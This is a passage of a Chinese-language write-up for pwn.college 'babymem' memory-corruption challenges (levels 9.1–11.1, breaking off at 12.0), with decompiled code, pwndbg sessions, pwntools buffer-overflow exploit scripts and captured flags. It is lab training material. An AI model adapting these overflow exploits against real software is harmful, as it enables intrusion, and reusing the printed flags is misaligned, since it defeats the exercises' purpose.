  unsigned __int64 v9; // [rsp+A8h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  memset(v7, 0, sizeof(v7));
  v8 = 0;
  v5 = v7;
  v6 = &v8;
  v4 = 0LL;
  printf("Payload size: ");
  __isoc99_scanf("%lu", &v4);
  printf("Send your payload (up to %lu bytes)!\n", v4);
  while ( *v6 < v4 )
  {
    v0 = read(0, &v5[*v6], 1uLL);
    *v6 += v0;
  }
  if ( *v6 < 0 )
  {
    v1 = __errno_location();
    v2 = strerror(*v1);
    printf("ERROR: Failed to read input -- %s!\n", v2);
    exit(1);
  }
  puts("Goodbye!");
  return 0LL;
}

同上一题一样，自己琢磨去吧……

Exploit

#!/usr/bin/python3

from pwn import context, ELF, log, pause, process, random, remote, gdb

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-9-1"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
b *challenge+212
b *challenge+233
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


destination = b"\x77"
fixed_offset = b"\xe4"
possible_bytes = [bytes([i]) for i in range(0x0F, 0x10F, 0x10)]
padding = b"".ljust(0x60, b"A") + destination
extra_padding = b"".ljust(0x17, b"A")


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.recvuntil(b"Payload size: ")
        target.sendline(payload_size)
        target.recvuntil(b"Send your payload")
        target.send(payload)

        response = target.recvall()
        # pause()

        return b"You win!" in response
    except Exception as e:
        log.exception(f"An error occurred: {e}")


while True:
    try:
        target = launch(debug=False)

        payload = padding
        payload += fixed_offset + random.choice(possible_bytes)
        payload += extra_padding
        log.info(f"Trying payload: {payload.hex()}")

        if send_payload(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{QfzSsyMdYf7_dP64EnXQ8DrrgQ1.0lNwMDL5cTNxgzW}

Level 10.0

Information

Category: Pwn

Description

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Write-up

__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  int v3; // eax
  int *v4; // rax
  char *v5; // rax
  _QWORD v7[3]; // [rsp+0h] [rbp-170h] BYREF
  int v8; // [rsp+1Ch] [rbp-154h]
  int v9; // [rsp+24h] [rbp-14Ch]
  size_t nbytes; // [rsp+28h] [rbp-148h] BYREF
  void *v11; // [rsp+30h] [rbp-140h]
  void *buf; // [rsp+38h] [rbp-138h]
  _BYTE v13[288]; // [rsp+40h] [rbp-130h] BYREF
  int v14; // [rsp+160h] [rbp-10h]
  char v15; // [rsp+164h] [rbp-Ch]
  unsigned __int64 v16; // [rsp+168h] [rbp-8h]
  __int64 savedregs; // [rsp+170h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+178h] [rbp+8h] BYREF

  v8 = a1;
  v7[2] = a2;
  v7[1] = a3;
  v16 = __readfsqword(0x28u);
  memset(v13, 0, sizeof(v13));
  v14 = 0;
  v15 = 0;
  v11 = v13;
  buf = &v13[37];
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)v7;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v7) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", v11);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 37);
  puts("large input length, and thus overflow the buffer.\n");
  puts("In this level, the flag will be loaded into memory.");
  puts("However, at no point will this program actually print the buffer storing the flag.");
  v3 = open("/flag", 0);
  read(v3, buf, 0x100uLL);
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", v11);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)v11 + nbytes,
    nbytes - 37);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v9 = read(0, v11, nbytes);
  if ( v9 < 0 )
  {
    v4 = __errno_location();
    v5 = strerror(*v4);
    printf("ERROR: Failed to read input -- %s!\n", v5);
    exit(1);
  }
  printf("You sent %d bytes!\n", v9);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", v11);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  printf("- the address of the flag is %p.\n", buf);
  putchar(10);
  printf("You said: %s\n", (const char *)v11);
  puts("Goodbye!");
  return 0LL;
}

4755 .rwsr-xr-x 18k root root 12 Dec 21:43 babymem-level-10-0*
0400 .r--------  57 root root 12 Dec 22:13 /flag

通过调试我们发现，read 并不会从 /flag 中读到数据。但由于这是个 SUID 程序，运行的时候会以这个程序的所有者的身份运行，而所有者是 root，那么理应我们可以读取 /flag 才对。这里的问题其实在于内核的保护策略：调试 SUID 程序的时候，Linux 内核会移除 SUID 位，使用当前用户权限调试，以此防止攻击者通过调试器以特权身份执行恶意代码。直接一个 sudo 怼上去看它服不服吧 LMAO。

注意到程序最后使用 printf 将整个 buf 的内容输出。而我们的 flag 在此之前就已经被保存到 buf 中了。所以这里考察的是 printf 在遇到 \x00 后认为字符串结束而中断输出。

所以我们只要使用垃圾值填充到 flag 保存的位置就好了。

~为什么那么简单……这可是至高的 Level 10！！！~

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-10-0"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
b *challenge+507
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


padding = b"".ljust(0x25, b"A")


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.recvuntil(b"Payload size: ")
        target.sendline(payload_size)
        target.recvuntil(b"Send your payload")
        target.send(payload)

        response = target.recvall()

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred: {e}")


try:
    target = launch(debug=False)

    payload = padding

    if send_payload(target, payload):
        log.success("Success! Exiting...")

        pause()
        exit()
except Exception as e:
    log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{cHV80jBzHGyTr_qaE0HdorP-81y.01NwMDL5cTNxgzW}

Level 10.1

Information

Category: Pwn

Description

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Write-up

试问这和上一题有何区别……

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-10-1"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
b *challenge+166
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


padding = b"".ljust(0x51, b"A")


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.recvuntil(b"Payload size: ")
        target.sendline(payload_size)
        target.recvuntil(b"Send your payload")
        target.send(payload)

        response = target.recvall()

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred: {e}")


try:
    target = launch(debug=False)

    payload = padding

    if send_payload(target, payload):
        log.success("Success! Exiting...")

        pause()
        exit()
except Exception as e:
    log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{4n50Ii5yzf-WULWGzVOqmN3vTgp.0FOwMDL5cTNxgzW}

Level 11.0

Information

Category: Pwn

Description

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Write-up

和前面两题差不多，考察点都是 SUID 的性质和看能不能想到 printf 判断字符串结束的机制。利用这个机制来泄漏 flag。

和前面两题最大的区别在于这次使用 mmap 函数来映射，或者说分配内存。之前是变量自动分配内存。

mmap 映射成功返回起始地址，失败返回 -1。

__int64 challenge()
{
  int *v0; // rax
  char *v1; // rax
  int i; // [rsp+2Ch] [rbp-34h]
  int fd; // [rsp+30h] [rbp-30h]
  int v5; // [rsp+34h] [rbp-2Ch]
  size_t nbytes; // [rsp+38h] [rbp-28h] BYREF
  void *v7; // [rsp+40h] [rbp-20h]
  void *buf; // [rsp+48h] [rbp-18h]
  void *v9; // [rsp+50h] [rbp-10h]
  void *v10; // [rsp+58h] [rbp-8h]

  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  puts("This challenge stores your input buffer in an mmapped page of memory!");
  v7 = mmap(0LL, 0x1000uLL, 3, 34, 0, 0LL);
  printf("Called mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0) = %p\n", v7);
  puts("In this level, the flag will be loaded into memory.");
  puts("However, at no point will this program actually print the buffer storing the flag.");
  puts("Mapping memory for the flag...");
  buf = mmap(0LL, 0x1000uLL, 3, 34, 0, 0LL);
  fd = open("/flag", 0);
  read(fd, buf, 0x400uLL);
  close(fd);
  printf("Called mmap(0, 0x1000, 4, MAP_SHARED, open(\"/flag\", 0), 0) = %p\n", buf);
  for ( i = 0; i <= 2; ++i )
  {
    v10 = mmap(0LL, 0x1000uLL, 3, 34, 0, 0LL);
    printf("Called mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0) = %p\n", v10);
  }
  puts("Memory mapping the input buffer...");
  v9 = mmap(0LL, 0x78uLL, 3, 34, 0, 0LL);
  printf("Called mmap(0, 120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, 0, 0) = %p\n", v9);
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", v9);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)v9 + nbytes,
    nbytes - 120);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v5 = read(0, v9, nbytes);
  if ( v5 < 0 )
  {
    v0 = __errno_location();
    v1 = strerror(*v0);
    printf("ERROR: Failed to read input -- %s!\n", v1);
    exit(1);
  }
  printf("You sent %d bytes!\n", v5);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", v9);
  printf("- the address of the flag is %p.\n", buf);
  putchar(10);
  printf("You said: %s\n", (const char *)v9);
  puts("Goodbye!");
  return 0LL;
}

alr，让我们调试看看需要多大的 padding：

Breakpoint 1, 0x000055e7d6a8cd2a in challenge ()
------- tip of the day (disable with set show-tips off) -------
Pwndbg mirrors some of Windbg commands like eq, ew, ed, eb, es, dq, dw, dd, db, ds for writing and reading memory
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0x1f
 RBX  0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
 RCX  0x22
 RDX  3
 RDI  0
 RSI  0x1000
 R8   0
 R9   0
 R10  0
 R11  0x202
 R12  1
 R13  0
 R14  0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0
 RSP  0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
 RIP  0x55e7d6a8cd2a (challenge+188) ◂— call 0x55e7d6a8c150
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x55e7d6a8cd2a <challenge+188>    call   mmap@plt                    <mmap@plt>
        addr: 0
        len: 0x1000
        prot: 3
        flags: 0x22
        fd: 0 (pipe:[532567])
        offset: 0

   0x55e7d6a8cd2f <challenge+193>    mov    qword ptr [rbp - 0x18], rax
   0x55e7d6a8cd33 <challenge+197>    mov    esi, 0                          ESI => 0
   0x55e7d6a8cd38 <challenge+202>    lea    rdi, [rip + 0x1530]             RDI => 0x55e7d6a8e26f ◂— 0x67616c662f /* '/flag' */
   0x55e7d6a8cd3f <challenge+209>    mov    eax, 0                          EAX => 0
   0x55e7d6a8cd44 <challenge+214>    call   open@plt                    <open@plt>

   0x55e7d6a8cd49 <challenge+219>    mov    dword ptr [rbp - 0x30], eax
   0x55e7d6a8cd4c <challenge+222>    mov    rcx, qword ptr [rbp - 0x18]
   0x55e7d6a8cd50 <challenge+226>    mov    eax, dword ptr [rbp - 0x30]
   0x55e7d6a8cd53 <challenge+229>    mov    edx, 0x400                      EDX => 0x400
   0x55e7d6a8cd58 <challenge+234>    mov    rsi, rcx
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'
02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a90010
04:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...
05:0028│-038 0x7ffcf78305f8 —▸ 0x7044dd967c80 (putchar+240) ◂— jmp 0x7044dd967bd6
06:0030│-030 0x7ffcf7830600 ◂— 0x230
07:0038│-028 0x7ffcf7830608 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55e7d6a8cd2a challenge+188
   1   0x55e7d6a8d063 main+213
   2   0x7044dd90ae08
   3   0x7044dd90aecc __libc_start_main+140
   4   0x55e7d6a8c20e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> ni
0x000055e7d6a8cd2f in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0x7044ddaff000 ◂— 0
 RBX  0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
*RCX  0x7044dd9fa24c (mmap64+44) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  3
 RDI  0
 RSI  0x1000
 R8   0
 R9   0
*R10  0x22
*R11  0x246
 R12  1
 R13  0
 R14  0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0
 RSP  0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
*RIP  0x55e7d6a8cd2f (challenge+193) ◂— mov qword ptr [rbp - 0x18], rax
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x55e7d6a8cd2a <challenge+188>    call   mmap@plt                    <mmap@plt>

 ► 0x55e7d6a8cd2f <challenge+193>    mov    qword ptr [rbp - 0x18], rax     [0x7ffcf7830618] => 0x7044ddaff000 ◂— 0
   0x55e7d6a8cd33 <challenge+197>    mov    esi, 0                          ESI => 0
   0x55e7d6a8cd38 <challenge+202>    lea    rdi, [rip + 0x1530]             RDI => 0x55e7d6a8e26f ◂— 0x67616c662f /* '/flag' */
   0x55e7d6a8cd3f <challenge+209>    mov    eax, 0                          EAX => 0
   0x55e7d6a8cd44 <challenge+214>    call   open@plt                    <open@plt>

   0x55e7d6a8cd49 <challenge+219>    mov    dword ptr [rbp - 0x30], eax
   0x55e7d6a8cd4c <challenge+222>    mov    rcx, qword ptr [rbp - 0x18]
   0x55e7d6a8cd50 <challenge+226>    mov    eax, dword ptr [rbp - 0x30]
   0x55e7d6a8cd53 <challenge+229>    mov    edx, 0x400                      EDX => 0x400
   0x55e7d6a8cd58 <challenge+234>    mov    rsi, rcx
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'
02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a90010
04:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...
05:0028│-038 0x7ffcf78305f8 —▸ 0x7044dd967c80 (putchar+240) ◂— jmp 0x7044dd967bd6
06:0030│-030 0x7ffcf7830600 ◂— 0x230
07:0038│-028 0x7ffcf7830608 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55e7d6a8cd2f challenge+193
   1   0x55e7d6a8d063 main+213
   2   0x7044dd90ae08
   3   0x7044dd90aecc __libc_start_main+140
   4   0x55e7d6a8c20e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p/x $rax
$1 = 0x7044ddaff000
pwndbg> c
Continuing.

Breakpoint 2, 0x000055e7d6a8ce04 in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0x23
 RBX  0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
*RCX  0x22
 RDX  3
 RDI  0
*RSI  0x78
 R8   0
 R9   0
*R10  0
*R11  0x202
 R12  1
 R13  0
 R14  0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0
 RSP  0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
*RIP  0x55e7d6a8ce04 (challenge+406) ◂— call 0x55e7d6a8c150
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x55e7d6a8ce04 <challenge+406>    call   mmap@plt                    <mmap@plt>
        addr: 0
        len: 0x78
        prot: 3
        flags: 0x22
        fd: 0 (pipe:[532567])
        offset: 0

   0x55e7d6a8ce09 <challenge+411>    mov    qword ptr [rbp - 0x10], rax
   0x55e7d6a8ce0d <challenge+415>    mov    rax, qword ptr [rbp - 0x10]
   0x55e7d6a8ce11 <challenge+419>    mov    rsi, rax
   0x55e7d6a8ce14 <challenge+422>    lea    rdi, [rip + 0x14cd]             RDI => 0x55e7d6a8e2e8 ◂— 'Called mmap(0, 120, PROT_READ|PROT_WRITE, MAP_PRIV...'
   0x55e7d6a8ce1b <challenge+429>    mov    eax, 0                          EAX => 0
   0x55e7d6a8ce20 <challenge+434>    call   printf@plt                  <printf@plt>

   0x55e7d6a8ce25 <challenge+439>    lea    rdi, [rip + 0x1508]     RDI => 0x55e7d6a8e334 ◂— 'Payload size: '
   0x55e7d6a8ce2c <challenge+446>    mov    eax, 0                  EAX => 0
   0x55e7d6a8ce31 <challenge+451>    call   printf@plt                  <printf@plt>

   0x55e7d6a8ce36 <challenge+456>    lea    rax, [rbp - 0x28]
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'
02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a90010
04:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...
05:0028│-038 0x7ffcf78305f8 ◂— 0x3dd967c80
06:0030│-030 0x7ffcf7830600 ◂— 0xffffffff
07:0038│-028 0x7ffcf7830608 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55e7d6a8ce04 challenge+406
   1   0x55e7d6a8d063 main+213
   2   0x7044dd90ae08
   3   0x7044dd90aecc __libc_start_main+140
   4   0x55e7d6a8c20e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> ni
0x000055e7d6a8ce09 in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
*RAX  0x7044ddafb000 ◂— 0
 RBX  0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
*RCX  0x7044dd9fa24c (mmap64+44) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  3
 RDI  0
 RSI  0x78
 R8   0
 R9   0
*R10  0x22
*R11  0x246
 R12  1
 R13  0
 R14  0x7044ddb3d000 (_rtld_global) —▸ 0x7044ddb3e2e0 —▸ 0x55e7d6a8b000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— 0
 RSP  0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
*RIP  0x55e7d6a8ce09 (challenge+411) ◂— mov qword ptr [rbp - 0x10], rax
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
   0x55e7d6a8ce04 <challenge+406>    call   mmap@plt                    <mmap@plt>

 ► 0x55e7d6a8ce09 <challenge+411>    mov    qword ptr [rbp - 0x10], rax     [0x7ffcf7830620] => 0x7044ddafb000 ◂— 0
   0x55e7d6a8ce0d <challenge+415>    mov    rax, qword ptr [rbp - 0x10]     RAX, [0x7ffcf7830620] => 0x7044ddafb000 ◂— 0
   0x55e7d6a8ce11 <challenge+419>    mov    rsi, rax                        RSI => 0x7044ddafb000 ◂— 0
   0x55e7d6a8ce14 <challenge+422>    lea    rdi, [rip + 0x14cd]             RDI => 0x55e7d6a8e2e8 ◂— 'Called mmap(0, 120, PROT_READ|PROT_WRITE, MAP_PRIV...'
   0x55e7d6a8ce1b <challenge+429>    mov    eax, 0                          EAX => 0
   0x55e7d6a8ce20 <challenge+434>    call   printf@plt                  <printf@plt>

   0x55e7d6a8ce25 <challenge+439>    lea    rdi, [rip + 0x1508]     RDI => 0x55e7d6a8e334 ◂— 'Payload size: '
   0x55e7d6a8ce2c <challenge+446>    mov    eax, 0                  EAX => 0
   0x55e7d6a8ce31 <challenge+451>    call   printf@plt                  <printf@plt>

   0x55e7d6a8ce36 <challenge+456>    lea    rax, [rbp - 0x28]
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffcf78305d0 —▸ 0x55e7d6a8e4f9 ◂— 0x2023232300232323 /* '###' */
01:0008│-058 0x7ffcf78305d8 —▸ 0x7ffcf78317a8 —▸ 0x7ffcf78336f3 ◂— 'MOTD_SHOWN=pam'
02:0010│-050 0x7ffcf78305e0 —▸ 0x7ffcf7831798 —▸ 0x7ffcf78336bc ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-11-0'
03:0018│-048 0x7ffcf78305e8 ◂— 0x1d6a90010
04:0020│-040 0x7ffcf78305f0 —▸ 0x7ffcf7830630 —▸ 0x7ffcf7831670 —▸ 0x7ffcf7831710 —▸ 0x7ffcf7831770 ◂— ...
05:0028│-038 0x7ffcf78305f8 ◂— 0x3dd967c80
06:0030│-030 0x7ffcf7830600 ◂— 0xffffffff
07:0038│-028 0x7ffcf7830608 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55e7d6a8ce09 challenge+411
   1   0x55e7d6a8d063 main+213
   2   0x7044dd90ae08
   3   0x7044dd90aecc __libc_start_main+140
   4   0x55e7d6a8c20e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> dist $rax $1
0x7044ddafb000->0x7044ddaff000 is 0x4000 bytes (0x800 words)

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-11-0"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
b *challenge+188
b *challenge+406
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


padding = b"".ljust(0x4000, b"A")


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.recvuntil(b"Payload size: ")
        target.sendline(payload_size)
        target.recvuntil(b"Send your payload")
        target.send(payload)

        response = target.recvall()

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred: {e}")


try:
    target = launch(debug=False)

    payload = padding

    if send_payload(target, payload):
        log.success("Success! Exiting...")

        pause()
        exit()
except Exception as e:
    log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{oNJmkkep5Mt0PwVQdAiStSjA960.0VOwMDL5cTNxgzW}

Level 11.1

Information

Category: Pwn

Description

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Write-up

和上题一样的哥……

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babymem-level-11-1"
HOST = "pwn.college"
PORT = 1337

gdbscript = """
b *challenge+104
b *challenge+262
b *challenge+352
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


padding = b"".ljust(0x4000, b"A")


def send_payload(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.recvuntil(b"Payload size: ")
        target.sendline(payload_size)
        target.recvuntil(b"Send your payload")
        target.send(payload)

        response = target.recvall()

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred: {e}")


try:
    target = launch(debug=False)

    payload = padding

    if send_payload(target, payload):
        log.success("Success! Exiting...")

        pause()
        exit()
except Exception as e:
    log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{I5165He8SxPMM_8YzEz5DkzRZ1c.0FMxMDL5cTNxgzW}

Level 12.0

Information

Category: Pwn

Description

Defeat a stack canary in a PIE binary by utilizing a bug left in the binary.

Write-up

__int64 __fastcall challenge(unsigned int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
